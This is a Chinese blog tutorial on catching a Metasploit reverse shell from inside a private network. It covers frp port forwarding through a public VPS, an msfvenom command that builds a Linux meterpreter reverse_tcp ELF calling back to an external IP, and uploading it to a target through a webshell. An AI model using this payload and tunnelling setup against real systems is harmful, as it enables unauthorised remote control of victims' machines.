内网的MSF接收反向shell

关于处于内网环境的msf接收反向连接shell的教程。

内网渗透两位主流工具无非cs与msf,cobaltstrike与msf不一样,它的teamserver直接部署在外网ip上,做攻击使用连接方便,而msf没有。

  • 大家的MSF也几乎都是处于虚拟机中的内网环境,攻击的用处也大都是和cobaltstrike传递shell做后渗透。

  • 但是,当我们的主动攻击目标是外网机器,或者说是不同且不通的内网环境,这种情况,我们该如何去接收反向的shell连接呢。

    网上搜索关于msf教程,也通常都是在内网中做的演示 ,但是在渗透过程中不乏会遇到需要利用msf的exploit进行漏洞利用的过程,文章应运而生,文章创作目的意在帮助需要的小伙伴。

使用到的

  • frp
  • 公网vps
  • xshell
  • 蚁剑

一,frp的配置,使其可以互通

首先在内网kali和自己的vps上下载好frp,没钱买vps就去用提供端口转发的第三方服务,网上太多了。
在这里插入图片描述
简单配置一下
vps,frps配置
在这里插入图片描述
内网kali,frpc配置
在这里插入图片描述

连接vps的7000端口通信,并且把本地的2222端口映射到vps的8000端口
接下来测试一下连通性:

在这里插入图片描述
连通是成功的。
注意:如果遇到ping通可以,但是nc不能通信,大家可以多换一个端口尝试。

二,生成msf的木马

最简单的命令生成一个

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=外网IP LPORT=外网端口 -f elf > /test/shell.elf

留意这个监听payload:linux/x64/meterpreter/reverse_tcp
在这里插入图片描述
之后把shell.elf下载到本地,再通过蚁剑上传到目标机器
在这里插入图片描述

三,启动frp进行流量转发

在这里插入图片描述
四,开启msf的监听,等待上线
在这里插入图片描述
这个时候注意默认的payload,是跟我们生成木马时使用的不一样,原则上用什么监听模式生成木马,就用什么监听模式接受反弹shell,所以要改成一样的。
在这里插入图片描述
我们选择监听本地,之所以是2222端口,因为我们前面讲到转发的本地端口是2222
在这里插入图片描述

run在这里插入图片描述
目标机运行上传的shell.elf
在这里插入图片描述
成功接收到了shell
在这里插入图片描述

OK 结束

这是执行载荷去接收shell的案例,其实用执行命令反弹shell的话(比如ms17010),(不只是MSF)还有一些原理和实现方法是一样的,主要是端口转发。
另一方面,对一部分人来说,这种方法的作用某种情况下确确实实是多余的,可能是我的学习方式跟大家不大相同,刹那间的突发奇想,自己也就研究了一下,也是希望能帮助到想到这个问题的小伙伴。

  • 有问题随时私信。

end

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值